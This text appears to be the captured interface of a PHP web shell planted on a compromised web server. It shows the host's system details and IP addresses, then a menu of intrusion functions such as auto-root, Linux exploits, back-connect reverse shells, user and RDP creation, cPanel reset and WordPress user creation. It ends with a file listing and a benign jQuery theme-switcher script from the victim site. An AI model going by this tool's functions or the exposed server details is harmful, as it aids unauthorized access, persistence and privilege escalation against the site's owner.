Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sdg.amatya.biz-8 /
app /
assets /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
bootstrap.js
48.44
KB
-rw-rw-r--
breakingNews.js
5.47
KB
-rw-rw-r--
jquery-3.2.1.min.js
84.63
KB
-rw-rw-r--
jquery.bootstrap.newsbox.min.j...
5.14
KB
-rw-rw-r--
jquery.nivo.slider.js
29.08
KB
-rw-rw-r--
jquery.simpleTicker.js
4.33
KB
-rw-rw-r--
optionswitcher.js
1.75
KB
-rw-rw-r--
slick.min.js
40.99
KB
-rw-rw-r--
vertical.slider.js
3.78
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : optionswitcher.js
var OptionSwitcher=function(){return{initOptionSwitcher:function(){var panel=jQuery('.option-switcher');jQuery('.option-switcher-btn').click(function(){jQuery('.option-switcher').show();});jQuery('.theme-close').click(function(){jQuery('.option-switcher').hide();});jQuery('li',panel).click(function(){var color=jQuery(this).attr("data-color");var data_logo=jQuery(this).attr("data-logo");setColor(color,data_logo);jQuery('.list-unstyled li',panel).removeClass("theme-active");jQuery(this).addClass("theme-active");});var setColor=function(color,data_logo){jQuery('#option_color').attr("href","css/colors/"+ color+".css");if(data_logo=='grayGreen'){jQuery('.logo img').attr("src","img/logo2"+".png");} else if(data_logo=='blueOrange'){jQuery('.logo img').attr("src","img/logo3"+".png");} else if(data_logo=='grayBlue'){jQuery('.logo img').attr("src","img/logo4"+".png");} else if(data_logo=='default-logo'){jQuery('.logo img').attr("src","img/logo"+".png");}} jQuery('.boxed-layout-btn').click(function(){jQuery(this).addClass("active-switcher-btn");jQuery(".wide-layout-btn").removeClass("active-switcher-btn");jQuery("body").addClass("bodyColor container");});jQuery('.wide-layout-btn').click(function(){jQuery(this).addClass("active-switcher-btn");jQuery(".boxed-layout-btn").removeClass("active-switcher-btn");jQuery("body").removeClass("bodyColor container");});jQuery('.static-header-btn').click(function(){jQuery(this).addClass("active-switcher-btn");jQuery(".fixed-header-btn").removeClass("active-switcher-btn");jQuery(".navbar-default").removeClass("navbar-main");});jQuery('.fixed-header-btn').click(function(){jQuery(this).addClass("active-switcher-btn");jQuery(".static-header-btn").removeClass("active-switcher-btn");jQuery(".navbar-default").addClass("navbar-main");});}};}();
Close